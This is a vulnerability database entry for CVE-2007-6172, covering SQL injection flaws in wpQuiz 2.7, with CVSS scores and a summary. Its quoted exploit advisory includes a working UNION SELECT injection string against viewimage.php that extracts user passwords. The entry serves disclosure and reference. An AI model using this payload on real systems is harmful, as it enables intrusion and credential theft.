10
CVSSv2

CVE-2007-6172

Published: 30/11/2007 Updated: 19/10/2017
CVSS v2 Base Score: 10 | Impact Score: 10 | Exploitability Score: 10
VMScore: 1000
Vector: AV:N/AC:L/Au:N/C:C/I:C/A:C

Vulnerability Summary

Multiple SQL injection vulnerabilities in wpQuiz 2.7 allow remote malicious users to execute arbitrary SQL commands via the id parameter to (1) viewimage.php and (2) comments.php.

Vulnerable Product Search on Vulmon Subscribe to Product

wire plastic design wpquiz 2.7

Exploits

Tytul: wpQuiz 27 Remote SQL Injection Vulnerability ### wireplastikcom/projectsphp Autor: Kacper E-Mail: kacper1964@yahoopl Strona: devilteameu Irc: ircmyg0tcom #devilteam Blad: viewimagephp?id=-1'+union+select+0,1,2,3,4,5,6,7,8,9,10,11,12,concat(user,char(58),password),14,15+from+users+where+id=1/* Pozniej sciagnij obrazek i ...